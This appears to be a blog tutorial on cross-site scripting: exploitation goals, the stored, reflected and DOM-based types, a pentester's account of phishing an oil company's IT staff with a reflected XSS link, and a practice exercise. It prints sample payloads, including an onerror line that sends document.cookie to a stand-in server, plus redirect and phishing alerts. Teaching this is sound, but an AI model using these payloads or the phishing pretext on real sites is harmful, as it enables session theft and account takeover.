XSS or “Cross-site scripting” is a type of Javascript vulnerability typically found in web applications (such as web browsers) through breaches of browser security, that enables attackers to inject evil client-side script into web pages viewed by other users.

Cross-site scripting carried out on websites was reported to make up almost a third of all attacks in 2017 by PT Security. Their effect may range from mildly annoying to, in some cases, root access, depending on the web application and attackers’ motives/resources.


Common XSS Explotation Goals:


– False Advertising

(<script>alert(“You have won 10000 dollars, send your credit details to [email protected]”)</script>)


– Stealing Cookies/Authentication Attacks

(<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>)


Malicious Redirect

(<script> window.location.replace("http://badsite.com");</script>)

– Phishing

(<script>alert(“This page has illegal content, please send your login credentials to [email protected] to avoid getting in trouble”)</script>)


– Adware

(<script>alert(“Hard wood sells the best wood in your area, call us now 1342 232 888”)</script>)


Types of XSS

Stored XSS

The most damaging (and least common) type of XSS is Stored (aka Persistent XSS). Persistent XSS attacks involve an attacker injecting a script (with the payload) that is permanently stored on the target web application. A classic example is a malicious script inserted by an attacker in a comment field on a blog or in a forum post or social media.


Reflected XSS

The second and most common type of XSS is Reflected XSS. Here, the attacker’s payload script has to be part of the HTTP request, which is sent to the web server and reflected back in such a way that the HTTP response includes the payload from the HTTP request. Using phishing emails and other social engineering methods, the attacker tricks the victim to secretly make a request to the server which contains the XSS payload by sending a evil link. The victim after clicking the link then ends up executing the attacker’s script that gets reflected and executed inside the victim’s browser.



DOM-based XSS is an advanced type of XSS attack which is made possible when the web application’s client side scripts write user provided data to the Document Object Model (DOM). The data is then read from the DOM by the web application and given to the browser. If the data is incorrectly handled, an attacker can inject an evil payload, which will be stored as part of the DOM and executed when the data is read back from the DOM. Due to the way this attack is executed, it can often evade a lot of anti-exploit systems as the payload is never sent to the server.


Real Life Example

I’d been given the task to perform a pentest for a large EU oil company. Just one problem: there was no way in! All their software was current version with 0 public exploits, I’d no information for a good social attack and their building was well guarded. I was starting to get desperate, and the only thing I had was a few email addresses.

After an hour of probing I found that their backup system had an external web interface. I slowly and carefully investigated each page I could access until I found two reflected XSS possibilities and a private IP disclosure vulnerability. Bingo!

Using this information I emailed the following to their IT department:



It’s Mikkel from Bulgarian Department.

The backup isn’t working again, if you login you can see on this link I cannot register anyone.

hxxps://</font><script>{encoded XSS payload}</script><font>&result=

Thanks and please hurry, we have four ships waiting!”


Using the reflected XSS as the exploit and the private IP information to add legitimacy I managed to steal the authentication, gain access and very quickly take over the network.


Exercise Time

Here you will have to chance to practice a little what you’ve just learned. When we are testing for XSS, the most common method to provide “proof of concept” is to make an alert box.




Good luck!

Deixe um comentário

O seu endereço de email não será publicado. Campos obrigatórios marcados com *